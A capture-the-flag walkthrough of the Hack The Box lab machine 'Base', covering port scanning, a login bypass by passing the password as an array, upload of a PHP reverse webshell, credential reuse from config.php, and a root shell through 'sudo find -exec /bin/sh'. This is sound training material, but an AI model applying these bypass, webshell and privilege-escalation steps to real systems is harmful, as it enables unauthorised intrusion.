Hack The Box: Starting Point - Base (Tier 2)


Base

box base


Enumeration

nmap reveals two TCP ports: 22 and 80.

Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f6:5c:9b:38:ec:a7:5c:79:1c:1f:18:1c:52:46:f7:0b (RSA)
|   256 65:0c:f7:db:42:03:46:07:f2:12:89:fe:11:20:2c:53 (ECDSA)
|_  256 b8:65:cd:3f:34:d8:02:6a:e3:18:23:3e:77:dd:87:40 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-title: Welcome to Base
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visiting the website, we find a page with a login functionality. The login-link endpoint is login/login.php. Due to misconfiguration, we can see the contents of the login/ directory by visiting http://<ip>/login/:

box base


Initial Foothold

Specifically, we can find a backup of the login.php-page called login.php.swp. We can read the file contents in clear text, for example the line

(strcmp($password, $_POST['password']) == 0)

which provides the user login. A quick google search for “strcmp” and “sql injection” leads to a blog post which shows that the login can be circumvented by passing an array password[] as parameter:

box base

and with this, we are in:

box base


We are directed to an uploads page. It seems that the upload itself is not restricted - any filetype can be uploaded. So let’s upload a reverse PHP webshell, for example the one from /usr/share/webshells/PHP. It works, but we still need to find out where the files are stored. Here I needed to check the walkthrough, because I was only trying with the wordlists from /usr/share/wordlists/dirbuster. However, for this test /usr/share/wordlists/dirb/ is the way to go:

box base

We find that the files are stored in the _uploaded directory (which is not in the wordlists from dirbuster, unfortunately). So when we upload the file and click on it, we get a shell:

box base

We can upgrade it to a full shell with python -c 'import pty; pty.spawn("/bin/bash")'.


Now let’s look around on the host. I tried to run linenum, but it didn’t reveal anything interesting unfortunately. However, on the webserver we can check the contents of config.php:

www-data@base:/var/www/html/login$ cat config.php
cat config.php
<?php
$username = "admin";
$password = "thisisagoodpassword";

And we find a password “thisisagoodpassword” which allows us to switch to user john. As john, we can read the user.txt file.


Privilege Escalation

The output of sudo -l reveals that john can run the /usr/bin/find command:

$ sudo -l
[sudo] password for john: thisisagoodpassword

Matching Defaults entries for john on base:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on base:
    (root : root) /usr/bin/find

After checking with GTFO bins, we run the following command to become root:

$ sudo find . -exec /bin/sh \; -quit

And with this, we can read the root flag as well.